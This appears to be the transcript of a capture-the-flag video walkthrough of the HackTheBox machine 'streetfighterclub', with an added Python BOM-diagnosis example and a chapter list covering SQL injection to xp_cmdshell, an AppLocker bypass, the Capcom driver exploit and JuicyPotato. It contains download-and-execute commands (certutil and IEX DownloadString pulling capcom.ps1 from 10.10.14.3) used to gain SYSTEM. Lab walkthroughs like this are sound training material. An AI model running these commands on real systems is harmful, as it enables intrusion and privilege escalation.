we can... let's go to a directory where we can write. Who are we? We're decoder, OK, users\decoder. And what do I want to do? I want to get a file on the box. So go up a directory, git clone, paste this, go into this, and we notice there are a lot of files here. We do find . | grep ps1. What we can do, -exec, or not exec, -name '*.ps1', same thing. And the unfortunate thing about this is some files don't have a line break at the very end, so we can't just combine them into one file by doing something like -exec cat, because if we less this we'll probably see some functions like this, but it ends on a curly brace and then goes into a function name, which isn't PowerShell; it'll fail. So what we have to do is a for loop. The reason I'm doing this is because I don't want to upload all these files onto the box, I just want to create one big ps1 file. So for i in $(find . -name '*.ps1'); do echo $i; OK, it echoes all the files. So now we can cat the file, echo nothing to put a line break, and then we can call this ../www/capcom.ps1. So let's look at this. Everything, oh, that function now is good. We have to get that file onto this box, so I'll use certutil again to just download it: -urlcache -split http://10.10.14.3/capcom.ps1 and two, what to say, capcom.ps1. Download it and we are denied. That's weird. Let us just try capcom; maybe AppLocker isn't fully bypassed and we still can't write ps1. Completed successfully. So we can Get-Content capcom.ps1, we want to assign that to a variable, I'll just do $x = Get-Content capcom.ps1. Cannot find. $x = Get-Content capcom, there we go. And I can't print that. dir here, capcom exists. Let's just try IEX (Get-Content capcom). Cannot convert System.Object to type... let's see, how can we load this? If we do $x... trying to think right now, we should be able to just... just type capcom: is not registered. And one of this... .\capcom actually loaded it into my memory space, so Capcom-ElevatePID is the function we want
to run that's in this capcom.ps1 script, and no, it did not. So let's see, let's just do IEX (New-Object Net.WebClient).DownloadString, I don't know why I didn't do this in the first place, http://10.10.14.3/capcom.ps1. There we go, it went, hit the web server, loaded Capcom, did IEX, put it into memory. We are good now. So if we do Capcom-ElevatePID, duplicating the system token and assigning the system token to the current shell, because if we do whoami we are NT AUTHORITY\SYSTEM. So now we can finally go into the Administrator directory, go to Desktop, root... if we do a dir, oh, it's root.exe. So we're not even done with the box yet; we still have another challenge to do, and that is all this reversing to get this root.exe working. So just when you thought you had done the box, brings you back i
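The encoding mismatch found at the clean.bat step (PowerShell's `>` writes UTF-16 with a byte-order mark that cmd.exe will not parse as a batch file, and that shows up in xxd as junk before the first command), as an added Python example that is not code from the video. It models both redirection behaviours on constructed script content and shows how to detect the BOM and normalise a dropped script back to 8-bit text; the cp1252 code page is an assumption.

```python
"""Diagnose why a .bat written through PowerShell redirection will not run.

Windows PowerShell 5.x writes '>' / Out-File output as UTF-16LE with a BOM
(bytes FF FE); cmd.exe's 'type src > dst' copies 8-bit text with no BOM.
Added example with constructed data; not files from the video.
"""
import codecs

# Constructed batch content; the encoding problem is independent of it.
SAMPLE_SCRIPT = "@echo off\r\necho constructed test line\r\n"

BOMS = {
    codecs.BOM_UTF16_LE: "utf-16-le-bom",
    codecs.BOM_UTF16_BE: "utf-16-be-bom",
    codecs.BOM_UTF8: "utf-8-bom",
}


def detect_encoding(data: bytes) -> str:
    """Classify a script file's byte encoding from its BOM and byte pattern."""
    for bom, name in BOMS.items():
        if data.startswith(bom):
            return name
    # BOM-less UTF-16LE ASCII text shows up as every odd-indexed byte being NUL.
    if len(data) >= 4 and all(b == 0 for b in data[1::2]):
        return "utf-16-le-nobom"
    if all(b < 0x80 for b in data):
        return "ascii"
    return "unknown-8bit"


def to_cmd_bytes(data: bytes) -> bytes:
    """Strip any BOM, decode, and re-encode as 8-bit text cmd.exe can run."""
    kind = detect_encoding(data)
    if kind == "utf-16-le-bom":
        text = data[2:].decode("utf-16-le")
    elif kind == "utf-16-be-bom":
        text = data[2:].decode("utf-16-be")
    elif kind == "utf-16-le-nobom":
        text = data.decode("utf-16-le")
    elif kind == "utf-8-bom":
        text = data[3:].decode("utf-8")
    else:
        text = data.decode("cp1252")  # assumption: Windows-1252 8-bit input
    # Fail loudly on characters cp1252 cannot hold instead of mangling the file.
    return text.encode("cp1252")


def powershell_redirect(text: str) -> bytes:
    """Model Windows PowerShell 5.x '>' / Out-File default: UTF-16LE + BOM."""
    return codecs.BOM_UTF16_LE + text.encode("utf-16-le")


def cmd_redirect(text: str) -> bytes:
    """Model cmd.exe 'type src > dst': 8-bit text copied through, no BOM."""
    return text.encode("cp1252")


def hexdump_head(data: bytes, n: int = 16) -> str:
    """First n bytes as hex, the view xxd gave of the 'junk before powershell'."""
    return " ".join(f"{b:02x}" for b in data[:n])


if __name__ == "__main__":
    ps = powershell_redirect(SAMPLE_SCRIPT)
    cm = cmd_redirect(SAMPLE_SCRIPT)
    print("PowerShell redirect:", len(ps), "bytes", detect_encoding(ps), hexdump_head(ps))
    print("cmd.exe redirect:   ", len(cm), "bytes", detect_encoding(cm), hexdump_head(cm))
    print("normalised equals cmd output:", to_cmd_bytes(ps) == cm)
```

The PowerShell-written file is a little over twice the size of the cmd-written one, which matches the 186-byte versus 91-byte difference noticed in the video.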
Original Description
00:00:55 - Begin of Recon Nmap, Identify OS Version, Check out Page to find hostname is streetfighterclub.htb.
00:02:53 - Using GoBuster and WFUZZ to identify: members.streetfighterclub.htb and members.streetfighterclub.htb/old/login.asp
00:08:45 - Begin poking around the members.streetfighterclub.htb page - Find SQL Injection
00:12:00 - Boolean injection to force the query to return "valid login". Play with logins to find it always returns to "Service not available"
00:14:25 - Testing Union Injections for easy exfil of data
00:15:50 - Examining Stacked Queries to make running our own SQL Statements easy. Then bunch of injections to run Xp_CMDShell and get output.
00:19:30 - Some valuable recon/information in debugging our SQL queries. Noticing small things really helps.
00:34:40 - Start of making a program to give us a command shell.
01:09:40 - Explaining the program we just created. Then fix a small bug.
01:12:45 - Begin of popping the box the intended way. Finding powershell is blocked but specifying the 32-bit version is not
01:17:10 - Return of 32-bit PowerShell... Identifying we can append data to c:\users\decoder\clean.bat -- That's odd, let's try to place a shell in it to see if it is being run.
01:32:40 - Found the issue! Powershell is encoding in UTF-16 which is confusing cmd prompt. 64-bit Shell as Decoder returned!
01:35:30 - Exploiting Capcom Driver to gain root shell, this post is super helpful: http://www.fuzzysecurity.com/tutorials/28.html
01:42:18 - Escalating to System via Capcom Exploit, then copying root.exe and checkdll.dll to our box so we can reverse it.
01:47:25 - Looking at the binaries in Ida64 Free
01:51:14 - Explaining what's happening and then writing a script to bypass the password check.
01:55:35 - Start of unintended way (Juicy Potato)
01:58:10 - Finding a world-writable spot under System32 for AppLocker Bypass, thanks @Bufferov3rride -- Then uploading JuicyPotato
02:06:10 - Start of modifying JuicyPotato to accept uppercase argu